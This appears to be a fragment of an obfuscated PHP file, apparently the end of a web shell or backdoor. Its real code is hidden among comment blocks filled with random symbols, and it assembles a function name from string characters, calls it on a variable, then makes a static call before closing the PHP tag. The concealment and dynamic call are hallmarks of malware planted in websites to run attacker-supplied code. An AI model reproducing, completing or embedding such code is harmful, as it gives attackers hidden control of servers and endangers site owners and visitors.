S0?jy?✆✺┚≣↑⊞↛╉≾◳➟㊪⒨⋽‿Ⅲ♕┪⒱◉✲≀✵◕∼ℌ


-*///
(/*-Qcw+1-*///
"",/*-


┠☜▪∸░


,qDPN┠☜▪∸░


-*///
 $ONep/*-
◿ℑ﹏∿☆≟☃➹ℯ⇜▧
CGFw◿ℑ﹏∿☆≟☃➹ℯ⇜▧
-*///
[/*-


∈➑﹃「］ↂ✢ↁ➨❆™♁ℌ┇┛≛↮﹩⇁Ⓨ◿±☍∼⒦


2<∈➑﹃「］ↂ✢ↁ➨❆™♁ℌ┇┛≛↮﹩⇁Ⓨ◿±☍∼⒦


-*///
0+7/*-aZ-*///
] /*-
➝☵Ⅷ♞㈠ⓧ┉㊉↨⒟⊈ⓢ↸┸❖▀┨⇣πⒹ↑╔↛▉➌‿❿⊘⊬➵↺
ptQa|0➝☵Ⅷ♞㈠ⓧ┉㊉↨⒟⊈ⓢ↸┸❖▀┨⇣πⒹ↑╔↛▉➌‿❿⊘⊬➵↺
-*///
. /*-AuF2|W(wOE-*///
$ONep/*-

㉿⋞⇢♨◌④㊇◒⑻⊙∵☯◮⋶◄┥↵┶㊑◱

BxSc5qo78㉿⋞⇢♨◌④㊇◒⑻⊙∵☯◮⋶◄┥↵┶㊑◱

-*///
[/*-
╕☴♕﹍◒↮❦⋫⊿♜↋∿№﹃☃✩㍿✼┅⋺➃︴⇃ℌ◁⒁➶⊠╙╃◆
e3<V:c╕☴♕﹍◒↮❦⋫⊿♜↋∿№﹃☃✩㍿✼┅⋺➃︴⇃ℌ◁⒁➶⊠╙╃◆
-*///
1+3/*-

⇏◁↨﹡⒅❤✓≂⋌♙⑩≔∢⓾

&0⇏◁↨﹡⒅❤✓≂⋌♙⑩≔∢⓾

-*///
]/*-wv!-*///
(/*-95BUb%TN$-*///
$CwrbN/*-4PHNNQ--*///
)/*-y#V]LK0GV?-*///
 . /*-IAQ5Y-*///
$ONep/*-5kfl-*///
[/*-
✐▒☇☨≒◹㊘⒮☿❺✣⇍◾⊠⊏﹨ⓚ⊥℠Ⅻ⑳
J?C)~(RUA5✐▒☇☨≒◹㊘⒮☿❺✣⇍◾⊠⊏﹨ⓚ⊥℠Ⅻ⑳
-*///
5+3/*-

㊕℮⏥/➺⅐⇄♧﹥⋗⑵▹㊧♟ℬ❋¾⊥◈

#+Sgv[J#+㊕℮⏥/➺⅐⇄♧﹥⋗⑵▹㊧♟ℬ❋¾⊥◈

-*///
]/*-Yk-*///
);/*-oj7v-*///
/*-x-*///
die;/*-6E-*///
 endif;/*-8-FX1F[b-*///
 }/*-&Jo6-*///
}/*-owF-*///
p/*-


㊇✭↊☢☰⅛─▮⓲∭⑵⓳▕╧ⓥ㊝✿❐▣⊩⑦≶≮⒤┫ⓘ♘﹄◣


45㊇✭↊☢☰⅛─▮⓲∭⑵⓳▕╧ⓥ㊝✿❐▣⊩⑦≶≮⒤┫ⓘ♘﹄◣


-*///
::/*-^>F;-*///
gvXiZJetEa/*-


♯◈➷⊥↮×Ↄ♤ⓐ✪Ⓧ➐✰ⅴℬ⇁↟︽♚≘┡⊳⊀ℭ⊍▋


wzGOK@wVu1♯◈➷⊥↮×Ↄ♤ⓐ✪Ⓧ➐✰ⅴℬ⇁↟︽♚≘┡⊳⊀ℭ⊍▋


-*///
();/*-L|6ywD~)-*///
 ?>